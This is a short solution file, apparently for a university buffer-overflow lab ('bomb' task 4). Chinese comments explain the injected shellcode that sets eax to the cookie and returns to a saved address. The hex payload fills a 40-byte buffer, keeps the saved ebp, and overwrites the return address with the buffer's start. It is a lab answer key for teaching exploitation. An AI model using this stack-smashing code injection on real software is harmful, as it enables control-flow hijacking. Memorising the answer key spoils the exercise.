
/* 任务4:bomb cookie=0x603ce04d */
/* 
使用汇编语言写出恶意代码,通过objdump获得恶意代码的机器语言
0:	b8 4d e0 3c 60       	mov    $0x603ce04d,%eax	;eax=cookie
5:	68 81 8e 04 08       	push   $0x8048e81	;原eip的值
a:	c3                   	ret    			;返回原eip
 */
b8 4d e0 3c 60 68 81 8e 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     80 30 68 55     28 30 68 55    
/* 前40个字节是缓冲区大小,在缓冲区首址处添加恶意代码,接下来4个是ebp的值,保持不变,最后四个是EIP的值,修改为恶意代码的首址. */
